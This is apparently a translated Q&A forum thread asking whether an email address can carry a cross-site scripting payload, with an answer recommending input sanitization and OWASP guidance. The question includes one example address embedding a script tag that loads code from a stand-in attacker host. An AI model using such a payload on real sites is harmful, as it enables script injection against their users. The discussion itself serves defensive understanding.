我想知道电子邮件地址是否可用于 XSS 攻击。
假设有一个网站可以注册并提供他的电子邮件地址。如果有人想攻击给定的网站,他或她可能会创建一个电子邮件地址,例如这个:
"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com
然后使用此电子邮件地址攻击该网站。
电子邮件地址中是否允许引用或脚本标签?
问问题
8977 次
1 回答
6
您示例中的电子邮件地址似乎有效。唯一不寻常的字符是引号"——其余的都是有效的。
维基百科建议您指定的电子邮件地址是有效的。
您需要确保在呈现之前对任意用户输入进行清理。
首先,您可能需要参考OWASP上提供的有关XSS和预防的信息。
于 2013-07-05T04:24:20.607 回答